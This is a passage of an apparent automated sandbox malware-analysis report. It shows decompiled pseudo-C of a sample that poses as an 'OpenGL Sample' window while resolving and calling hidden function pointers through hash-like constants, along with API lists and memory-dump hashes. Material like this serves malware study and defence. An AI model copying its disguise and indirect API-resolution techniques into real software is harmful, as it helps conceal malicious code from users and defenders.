                                                                                                                                                                                                                                                                          				_v120.lpfnWndProc = E004019EF;
                                                                                                                                                                                                                                                                          				_v120.cbClsExtra = 0;
                                                                                                                                                                                                                                                                          				_v120.cbWndExtra = 0;
                                                                                                                                                                                                                                                                          				_v120.hInstance = _a4;
                                                                                                                                                                                                                                                                          				_v120.hIcon = LoadIconA(0, 0x7f00);
                                                                                                                                                                                                                                                                          				_v120.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                                                                                                                                                                                          				_v120.hbrBackground = GetStockObject(4);
                                                                                                                                                                                                                                                                          				_v120.lpszMenuName = 0;
                                                                                                                                                                                                                                                                          				_v120.lpszClassName = "GLSample";
                                                                                                                                                                                                                                                                          				RegisterClassA( &_v120);
                                                                                                                                                                                                                                                                          				ShowWindow(_v24, 0); // executed
                                                                                                                                                                                                                                                                          				_t107 = CreateWindowExA(0, "GLSample", "OpenGL Sample", 0x80c80000, 0, 0, 0x100, 0x100, 0, 0, _a4, 0); // executed
                                                                                                                                                                                                                                                                          				_t181 = _t174 - 0x50;
                                                                                                                                                                                                                                                                          				_v24 = _t107;
                                                                                                                                                                                                                                                                          				_v28 = 0xa93;
                                                                                                                                                                                                                                                                          				_v32 = 0x63c;
                                                                                                                                                                                                                                                                          				_v76 = 0;
                                                                                                                                                                                                                                                                          				_v80 = 0;
                                                                                                                                                                                                                                                                          				if((E0040140E(_t107) & 0xffffff00 | _t108 != 0x00000000) != 0) {
                                                                                                                                                                                                                                                                          					ExitProcess(0xffffa883);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				 *0x403000 = 0;
                                                                                                                                                                                                                                                                          				 *0x403004 = 0;
                                                                                                                                                                                                                                                                          				 *0x403008 = 0;
                                                                                                                                                                                                                                                                          				 *0x403010 = 0;
                                                                                                                                                                                                                                                                          				 *0x40300c = 0;
                                                                                                                                                                                                                                                                          				 *0x403014 = 0;
                                                                                                                                                                                                                                                                          				 *0x405020 = 0x270034da;
                                                                                                                                                                                                                                                                          				E00401479(_v28,  &_v80); // executed
                                                                                                                                                                                                                                                                          				E00401479(_v32,  &_v76); // executed
                                                                                                                                                                                                                                                                          				memset(0x405008, 0, 0x18 << 0);
                                                                                                                                                                                                                                                                          				 *0x405008 = 0;
                                                                                                                                                                                                                                                                          				 *0x40500c = 1;
                                                                                                                                                                                                                                                                          				 *0x405010 = _v76;
                                                                                                                                                                                                                                                                          				_v176 = 0x405008;
                                                                                                                                                                                                                                                                          				 *_v80();
                                                                                                                                                                                                                                                                          				_t183 = _t181 + 0xc - 4;
                                                                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                                                                          				_v176 = 0x47754b17;
                                                                                                                                                                                                                                                                          				 *_t183 =  *0x405018;
                                                                                                                                                                                                                                                                          				_v36 = E00401362();
                                                                                                                                                                                                                                                                          				 *_v36();
                                                                                                                                                                                                                                                                          				_v172 =  &_v44;
                                                                                                                                                                                                                                                                          				_v176 =  &_v40;
                                                                                                                                                                                                                                                                          				 *_t183 = _v24;
                                                                                                                                                                                                                                                                          				_t128 = E00401A87();
                                                                                                                                                                                                                                                                          				L8:
                                                                                                                                                                                                                                                                          				if((_t128 & 0xffffff00 | _v16 == 0x00000000) != 0) {
                                                                                                                                                                                                                                                                          					_v164 = 1;
                                                                                                                                                                                                                                                                          					_v168 = 0;
                                                                                                                                                                                                                                                                          					_v172 = 0;
                                                                                                                                                                                                                                                                          					_v176 = 0;
                                                                                                                                                                                                                                                                          					 *_t183 =  &_v72;
                                                                                                                                                                                                                                                                          					_t131 = PeekMessageA(??, ??, ??, ??, ??);
                                                                                                                                                                                                                                                                          					_t183 = _t183 - 0x14;
                                                                                                                                                                                                                                                                          					if((_t131 & 0xffffff00 | _t131 != 0x00000000) == 0) {
                                                                                                                                                                                                                                                                          						_v168 = 0;
                                                                                                                                                                                                                                                                          						_v172 = 0;
                                                                                                                                                                                                                                                                          						_v176 = 0;
                                                                                                                                                                                                                                                                          						 *_t183 = 0;
                                                                                                                                                                                                                                                                          						L00401B8C();
                                                                                                                                                                                                                                                                          						_v196 = 0x4000;
                                                                                                                                                                                                                                                                          						L00401B94();
                                                                                                                                                                                                                                                                          						_t185 = _t183 - 0xc;
                                                                                                                                                                                                                                                                          						L00401B9C();
                                                                                                                                                                                                                                                                          						_v188 = 0x3f800000;
                                                                                                                                                                                                                                                                          						_v192 = 0;
                                                                                                                                                                                                                                                                          						_v196 = 0;
                                                                                                                                                                                                                                                                          						 *_t185 = _v20;
                                                                                                                                                                                                                                                                          						L00401BA4();
                                                                                                                                                                                                                                                                          						_v216 = 4;
                                                                                                                                                                                                                                                                          						L00401BAC();
                                                                                                                                                                                                                                                                          						_t187 = _t185 - 0xc;
                                                                                                                                                                                                                                                                          						_v212 = 0;
                                                                                                                                                                                                                                                                          						_v216 = 0;
                                                                                                                                                                                                                                                                          						 *_t187 = 0x3f800000;
                                                                                                                                                                                                                                                                          						L00401BB4();
                                                                                                                                                                                                                                                                          						_v228 = 0x3f800000;
                                                                                                                                                                                                                                                                          						_v232 = 0;
                                                                                                                                                                                                                                                                          						L00401BBC();
                                                                                                                                                                                                                                                                          						_t189 = _t187 - 4;
                                                                                                                                                                                                                                                                          						_v232 = 0;
                                                                                                                                                                                                                                                                          						_v236 = 0x3f800000;
                                                                                                                                                                                                                                                                          						 *_t189 = 0;
                                                                                                                                                                                                                                                                          						L00401BB4();
                                                                                                                                                                                                                                                                          						_v248 = 0xbf000000;
                                                                                                                                                                                                                                                                          						_v252 = 0x3f5eb852;
                                                                                                                                                                                                                                                                          						L00401BBC();
                                                                                                                                                                                                                                                                          						_t191 = _t189 - 4;
                                                                                                                                                                                                                                                                          						_v252 = 0x3f800000;
                                                                                                                                                                                                                                                                          						_v256 = 0;
                                                                                                                                                                                                                                                                          						 *_t191 = 0;
                                                                                                                                                                                                                                                                          						L00401BB4();
                                                                                                                                                                                                                                                                          						_t192 = _t191 - 0xc;
                                                                                                                                                                                                                                                                          						_v268 = 0xbf000000;
                                                                                                                                                                                                                                                                          						 *_t192 = 0xbf5eb852;
                                                                                                                                                                                                                                                                          						L00401BBC();
                                                                                                                                                                                                                                                                          						_t193 = _t192 - 8;
                                                                                                                                                                                                                                                                          						L00401BC4();
                                                                                                                                                                                                                                                                          						L00401BCC();
                                                                                                                                                                                                                                                                          						 *_t193 = _v40;
                                                                                                                                                                                                                                                                          						_t128 = SwapBuffers(??);
                                                                                                                                                                                                                                                                          						_t194 = _t193 - 4;
                                                                                                                                                                                                                                                                          						asm("fld1");
                                                                                                                                                                                                                                                                          						asm("faddp st1, st0");
                                                                                                                                                                                                                                                                          						 *_t194 = 1;
                                                                                                                                                                                                                                                                          						Sleep(??);
                                                                                                                                                                                                                                                                          						_t183 = _t194 - 4;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t128 = _v68;
                                                                                                                                                                                                                                                                          						if(_t128 != 0x12) {
                                                                                                                                                                                                                                                                          							 *_t183 =  &_v72;
                                                                                                                                                                                                                                                                          							TranslateMessage(??);
                                                                                                                                                                                                                                                                          							_t197 = _t183 - 4;
                                                                                                                                                                                                                                                                          							 *_t197 =  &_v72;
                                                                                                                                                                                                                                                                          							_t128 = DispatchMessageA(??);
                                                                                                                                                                                                                                                                          							_t183 = _t197 - 4;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v16 = 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v172 = _v44;
                                                                                                                                                                                                                                                                          				_v176 = _v40;
                                                                                                                                                                                                                                                                          				 *_t183 = _v24;
                                                                                                                                                                                                                                                                          				E00401B48();
                                                                                                                                                                                                                                                                          				 *_t183 = _v24;
                                                                                                                                                                                                                                                                          				DestroyWindow(??);
                                                                                                                                                                                                                                                                          				return _v64;
                                                                                                                                                                                                                                                                          			}
























































                                                                                                                                                                                                                                                                          0x004015b1
                                                                                                                                                                                                                                                                          0x004015bd
                                                                                                                                                                                                                                                                          0x004015c0
                                                                                                                                                                                                                                                                          0x004015c7
                                                                                                                                                                                                                                                                          0x004015ce
                                                                                                                                                                                                                                                                          0x004015d5
                                                                                                                                                                                                                                                                          0x004015df
                                                                                                                                                                                                                                                                          0x004015f9
                                                                                                                                                                                                                                                                          0x00401613
                                                                                                                                                                                                                                                                          0x00401625
                                                                                                                                                                                                                                                                          0x00401628
                                                                                                                                                                                                                                                                          0x0040162f
                                                                                                                                                                                                                                                                          0x0040163c
                                                                                                                                                                                                                                                                          0x00401652
                                                                                                                                                                                                                                                                          0x004016b8
                                                                                                                                                                                                                                                                          0x004016bd
                                                                                                                                                                                                                                                                          0x004016c0
                                                                                                                                                                                                                                                                          0x004016c3
                                                                                                                                                                                                                                                                          0x004016ca
                                                                                                                                                                                                                                                                          0x004016d1
                                                                                                                                                                                                                                                                          0x004016d8
                                                                                                                                                                                                                                                                          0x004016eb
                                                                                                                                                                                                                                                                          0x004016f4
                                                                                                                                                                                                                                                                          0x004016f4
                                                                                                                                                                                                                                                                          0x004016f9
                                                                                                                                                                                                                                                                          0x00401703
                                                                                                                                                                                                                                                                          0x0040170d
                                                                                                                                                                                                                                                                          0x00401717
                                                                                                                                                                                                                                                                          0x00401721
                                                                                                                                                                                                                                                                          0x0040172b
                                                                                                                                                                                                                                                                          0x00401735
                                                                                                                                                                                                                                                                          0x0040174c
                                                                                                                                                                                                                                                                          0x0040175e
                                                                                                                                                                                                                                                                          0x00401773
                                                                                                                                                                                                                                                                          0x00401775
                                                                                                                                                                                                                                                                          0x0040177f
                                                                                                                                                                                                                                                                          0x0040178c
                                                                                                                                                                                                                                                                          0x00401794
                                                                                                                                                                                                                                                                          0x0040179b
                                                                                                                                                                                                                                                                          0x0040179d
                                                                                                                                                                                                                                                                          0x004017a0
                                                                                                                                                                                                                                                                          0x004017b2
                                                                                                                                                                                                                                                                          0x004017ba
                                                                                                                                                                                                                                                                          0x004017c2
                                                                                                                                                                                                                                                                          0x004017c8
                                                                                                                                                                                                                                                                          0x004017cd
                                                                                                                                                                                                                                                                          0x004017d4
                                                                                                                                                                                                                                                                          0x004017db
                                                                                                                                                                                                                                                                          0x004017de
                                                                                                                                                                                                                                                                          0x004019ad
                                                                                                                                                                                                                                                                          0x004019b6
                                                                                                                                                                                                                                                                          0x004017e8
                                                                                                                                                                                                                                                                          0x004017f0
                                                                                                                                                                                                                                                                          0x004017f8
                                                                                                                                                                                                                                                                          0x00401800
                                                                                                                                                                                                                                                                          0x0040180b
                                                                                                                                                                                                                                                                          0x0040180e
                                                                                                                                                                                                                                                                          0x00401813
                                                                                                                                                                                                                                                                          0x0040181d
                                                                                                                                                                                                                                                                          0x00401859
                                                                                                                                                                                                                                                                          0x00401862
                                                                                                                                                                                                                                                                          0x0040186b
                                                                                                                                                                                                                                                                          0x00401874
                                                                                                                                                                                                                                                                          0x00401877
                                                                                                                                                                                                                                                                          0x0040187f
                                                                                                                                                                                                                                                                          0x00401886
                                                                                                                                                                                                                                                                          0x0040188b
                                                                                                                                                                                                                                                                          0x0040188e
                                                                                                                                                                                                                                                                          0x00401898
                                                                                                                                                                                                                                                                          0x004018a1
                                                                                                                                                                                                                                                                          0x004018aa
                                                                                                                                                                                                                                                                          0x004018b1
                                                                                                                                                                                                                                                                          0x004018b4
                                                                                                                                                                                                                                                                          0x004018bc
                                                                                                                                                                                                                                                                          0x004018c3
                                                                                                                                                                                                                                                                          0x004018c8
                                                                                                                                                                                                                                                                          0x004018d0
                                                                                                                                                                                                                                                                          0x004018d9
                                                                                                                                                                                                                                                                          0x004018e2
                                                                                                                                                                                                                                                                          0x004018e5
                                                                                                                                                                                                                                                                          0x004018f2
                                                                                                                                                                                                                                                                          0x004018fb
                                                                                                                                                                                                                                                                          0x004018fe
                                                                                                                                                                                                                                                                          0x00401903
                                                                                                                                                                                                                                                                          0x0040190b
                                                                                                                                                                                                                                                                          0x00401914
                                                                                                                                                                                                                                                                          0x0040191d
                                                                                                                                                                                                                                                                          0x00401920
                                                                                                                                                                                                                                                                          0x0040192d
                                                                                                                                                                                                                                                                          0x00401936
                                                                                                                                                                                                                                                                          0x00401939
                                                                                                                                                                                                                                                                          0x0040193e
                                                                                                                                                                                                                                                                          0x00401946
                                                                                                                                                                                                                                                                          0x0040194f
                                                                                                                                                                                                                                                                          0x00401958
                                                                                                                                                                                                                                                                          0x0040195b
                                                                                                                                                                                                                                                                          0x00401960
                                                                                                                                                                                                                                                                          0x00401968
                                                                                                                                                                                                                                                                          0x00401971
                                                                                                                                                                                                                                                                          0x00401974
                                                                                                                                                                                                                                                                          0x00401979
                                                                                                                                                                                                                                                                          0x0040197c
                                                                                                                                                                                                                                                                          0x00401981
                                                                                                                                                                                                                                                                          0x00401989
                                                                                                                                                                                                                                                                          0x0040198c
                                                                                                                                                                                                                                                                          0x00401991
                                                                                                                                                                                                                                                                          0x00401997
                                                                                                                                                                                                                                                                          0x00401999
                                                                                                                                                                                                                                                                          0x0040199e
                                                                                                                                                                                                                                                                          0x004019a5
                                                                                                                                                                                                                                                                          0x004019aa
                                                                                                                                                                                                                                                                          0x0040181f
                                                                                                                                                                                                                                                                          0x0040181f
                                                                                                                                                                                                                                                                          0x00401825
                                                                                                                                                                                                                                                                          0x00401836
                                                                                                                                                                                                                                                                          0x00401839
                                                                                                                                                                                                                                                                          0x0040183e
                                                                                                                                                                                                                                                                          0x00401844
                                                                                                                                                                                                                                                                          0x00401847
                                                                                                                                                                                                                                                                          0x0040184c
                                                                                                                                                                                                                                                                          0x00401827
                                                                                                                                                                                                                                                                          0x00401827
                                                                                                                                                                                                                                                                          0x00401827
                                                                                                                                                                                                                                                                          0x00401825
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0040181d
                                                                                                                                                                                                                                                                          0x004019c2
                                                                                                                                                                                                                                                                          0x004019c6
                                                                                                                                                                                                                                                                          0x004019cd
                                                                                                                                                                                                                                                                          0x004019d0
                                                                                                                                                                                                                                                                          0x004019d8
                                                                                                                                                                                                                                                                          0x004019db
                                                                                                                                                                                                                                                                          0x004019ec

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.558886062.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558685401.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.558979025.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559069325.0000000000406000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559239825.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.559886186.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_iJzpyjAehB.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Color3fMessageVertex2fWindow$ClearLoadMatrixObject$BeginBuffersClassColorCreateCursorDestroyDispatchExitIconLinkOpenPeekProcessPushRegisterRotatefShowSleepStockSwapSymbolicTranslate
                                                                                                                                                                                                                                                                          • String ID: $n@@$n@@$w@@
                                                                                                                                                                                                                                                                          • API String ID: 3509731714-3974239601
                                                                                                                                                                                                                                                                          • Opcode ID: 31a8f6508b6a69f61902bea075c8000fa891c0c2f27cafeab63b9a8dec4b5150
                                                                                                                                                                                                                                                                          • Instruction ID: 3f63ee1ad5c8460eb48b3716f0d43e342052f4db54b8eddb3283573a26ff4ac5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31a8f6508b6a69f61902bea075c8000fa891c0c2f27cafeab63b9a8dec4b5150
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DB1B6B09043059BDB00FFA9C55939EBFF0AB44308F50893EE484AB395E7799949CF96
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                                                                                          			E04004020(intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, char _a24) {
                                                                                                                                                                                                                                                                          				signed int _v5;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION _v44;
                                                                                                                                                                                                                                                                          				long _v48;
                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                          				void _v56;
                                                                                                                                                                                                                                                                          				long _v60;
                                                                                                                                                                                                                                                                          				HANDLE* _v64;
                                                                                                                                                                                                                                                                          				void* _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				void* _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				signed int _v84;
                                                                                                                                                                                                                                                                          				void _v92;
                                                                                                                                                                                                                                                                          				long _v96;
                                                                                                                                                                                                                                                                          				signed int _v100;
                                                                                                                                                                                                                                                                          				HANDLE* _v104;
                                                                                                                                                                                                                                                                          				HANDLE* _v108;
                                                                                                                                                                                                                                                                          				void* _t114;
                                                                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                                                                          				void* _t188;
                                                                                                                                                                                                                                                                          				void* _t189;
                                                                                                                                                                                                                                                                          				void* _t191;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v5 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 > 0 && _a12 != 0 && _a16 > 0) {
                                                                                                                                                                                                                                                                          					E04007D20( &_v56,  &_v56, 0, 0x29);
                                                                                                                                                                                                                                                                          					_t189 = _t188 + 0xc;
                                                                                                                                                                                                                                                                          					InitializeCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          					_v16 = _a24;
                                                                                                                                                                                                                                                                          					_v20 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          					asm("cdq");
                                                                                                                                                                                                                                                                          					_v12 = _a8 / _a20;
                                                                                                                                                                                                                                                                          					_v60 = 0;
                                                                                                                                                                                                                                                                          					while(_v60 < _a16) {
                                                                                                                                                                                                                                                                          						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						if(_v52 != 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v52, 0, 0x8000);
                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_t198 = _v56;
                                                                                                                                                                                                                                                                          						if(_v56 != 0) {
                                                                                                                                                                                                                                                                          							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                          							_v56 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						ResetEvent(_v20);
                                                                                                                                                                                                                                                                          						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						_t114 = CreateThread(0, 0, E04004AC0,  &_v56, 0, 0); // executed
                                                                                                                                                                                                                                                                          						_v56 = _t114;
                                                                                                                                                                                                                                                                          						_v104 = E040097A0( ~(0 | _t198 > 0x00000000) | _a20 * 0x00000004);
                                                                                                                                                                                                                                                                          						_v64 = _v104;
                                                                                                                                                                                                                                                                          						E04007D20(_v104, _v64, 0, _a20 << 2);
                                                                                                                                                                                                                                                                          						_t191 = _t189 + 0x10;
                                                                                                                                                                                                                                                                          						_v100 = 0;
                                                                                                                                                                                                                                                                          						while(_v100 < _a20) {
                                                                                                                                                                                                                                                                          							_v64[_v100] = 0;
                                                                                                                                                                                                                                                                          							E04007D20(_v64,  &_v92, 0, 0x1c);
                                                                                                                                                                                                                                                                          							_t191 = _t191 + 0xc;
                                                                                                                                                                                                                                                                          							_v68 =  &_v56;
                                                                                                                                                                                                                                                                          							_v72 = _a12;
                                                                                                                                                                                                                                                                          							_v92 = _a4;
                                                                                                                                                                                                                                                                          							_v84 = _v100 * _v12;
                                                                                                                                                                                                                                                                          							if(_v100 >= _a20 - 1) {
                                                                                                                                                                                                                                                                          								_v80 = _a8 - 1;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v80 = _v84 + _v12 - 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v76 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                          							_t141 = CreateThread(0, 0, E04004BA0,  &_v92, 0, 0); // executed
                                                                                                                                                                                                                                                                          							_v64[_v100] = _t141;
                                                                                                                                                                                                                                                                          							WaitForSingleObject(_v76, 0xffffffff);
                                                                                                                                                                                                                                                                          							FindCloseChangeNotification(_v76); // executed
                                                                                                                                                                                                                                                                          							_v100 = _v100 + 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						WaitForMultipleObjects(_a20, _v64, 1, 0xffffffff);
                                                                                                                                                                                                                                                                          						_v96 = WaitForSingleObject(_v20, 0x2710);
                                                                                                                                                                                                                                                                          						if(_v96 == 0) {
                                                                                                                                                                                                                                                                          							_v5 = 1;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v96 = WaitForSingleObject(_v56, 0x3e8);
                                                                                                                                                                                                                                                                          						if(_v96 != 0) {
                                                                                                                                                                                                                                                                          							TerminateThread(_v56, 0);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						EnterCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						if(_v52 != 0) {
                                                                                                                                                                                                                                                                          							VirtualFree(_v52, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						LeaveCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          						_v108 = _v64;
                                                                                                                                                                                                                                                                          						E040097C0(_v108);
                                                                                                                                                                                                                                                                          						_t189 = _t191 + 4;
                                                                                                                                                                                                                                                                          						if((_v5 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          							_v60 = _v60 + 1;
                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						break;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					DeleteCriticalSection( &_v44);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _v5;
                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                          0x04004026
                                                                                                                                                                                                                                                                          0x0400402e
                                                                                                                                                                                                                                                                          0x0400405a
                                                                                                                                                                                                                                                                          0x0400405f
                                                                                                                                                                                                                                                                          0x04004066
                                                                                                                                                                                                                                                                          0x0400406f
                                                                                                                                                                                                                                                                          0x04004080
                                                                                                                                                                                                                                                                          0x04004086
                                                                                                                                                                                                                                                                          0x0400408a
                                                                                                                                                                                                                                                                          0x0400408d
                                                                                                                                                                                                                                                                          0x0400409f
                                                                                                                                                                                                                                                                          0x040040af
                                                                                                                                                                                                                                                                          0x040040b9
                                                                                                                                                                                                                                                                          0x040040c6
                                                                                                                                                                                                                                                                          0x040040cc
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040d3
                                                                                                                                                                                                                                                                          0x040040da
                                                                                                                                                                                                                                                                          0x040040de
                                                                                                                                                                                                                                                                          0x040040e6
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040ec
                                                                                                                                                                                                                                                                          0x040040f7
                                                                                                                                                                                                                                                                          0x04004101
                                                                                                                                                                                                                                                                          0x04004118
                                                                                                                                                                                                                                                                          0x0400411e
                                                                                                                                                                                                                                                                          0x0400413d
                                                                                                                                                                                                                                                                          0x04004143
                                                                                                                                                                                                                                                                          0x04004153
                                                                                                                                                                                                                                                                          0x04004158
                                                                                                                                                                                                                                                                          0x0400415b
                                                                                                                                                                                                                                                                          0x0400416d
                                                                                                                                                                                                                                                                          0x0400417f
                                                                                                                                                                                                                                                                          0x0400418e
                                                                                                                                                                                                                                                                          0x04004193
                                                                                                                                                                                                                                                                          0x04004199
                                                                                                                                                                                                                                                                          0x0400419f
                                                                                                                                                                                                                                                                          0x040041a5
                                                                                                                                                                                                                                                                          0x040041af
                                                                                                                                                                                                                                                                          0x040041bb
                                                                                                                                                                                                                                                                          0x040041d2
                                                                                                                                                                                                                                                                          0x040041bd
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041c7
                                                                                                                                                                                                                                                                          0x040041e3
                                                                                                                                                                                                                                                                          0x040041f7
                                                                                                                                                                                                                                                                          0x04004203
                                                                                                                                                                                                                                                                          0x0400420c
                                                                                                                                                                                                                                                                          0x04004216
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400416a
                                                                                                                                                                                                                                                                          0x0400422d
                                                                                                                                                                                                                                                                          0x04004242
                                                                                                                                                                                                                                                                          0x04004249
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400424b
                                                                                                                                                                                                                                                                          0x0400425e
                                                                                                                                                                                                                                                                          0x04004265
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x0400426d
                                                                                                                                                                                                                                                                          0x04004277
                                                                                                                                                                                                                                                                          0x04004281
                                                                                                                                                                                                                                                                          0x0400428e
                                                                                                                                                                                                                                                                          0x04004294
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x0400429b
                                                                                                                                                                                                                                                                          0x040042a6
                                                                                                                                                                                                                                                                          0x040042af
                                                                                                                                                                                                                                                                          0x040042b6
                                                                                                                                                                                                                                                                          0x040042bb
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x0400409c
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c6
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040042c4
                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                          0x040042d1
                                                                                                                                                                                                                                                                          0x040042dd

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                          • ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 040041DD
                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 040041F7
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0400420C
                                                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNEL32(?), ref: 04004216
                                                                                                                                                                                                                                                                          • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0400422D
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 0400423C
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 04004258
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000000,00000000), ref: 0400426D
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 04004277
                                                                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0400428E
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 040042A6
                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 040042D1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.599743411.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.599611327.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600083870.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.600248652.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
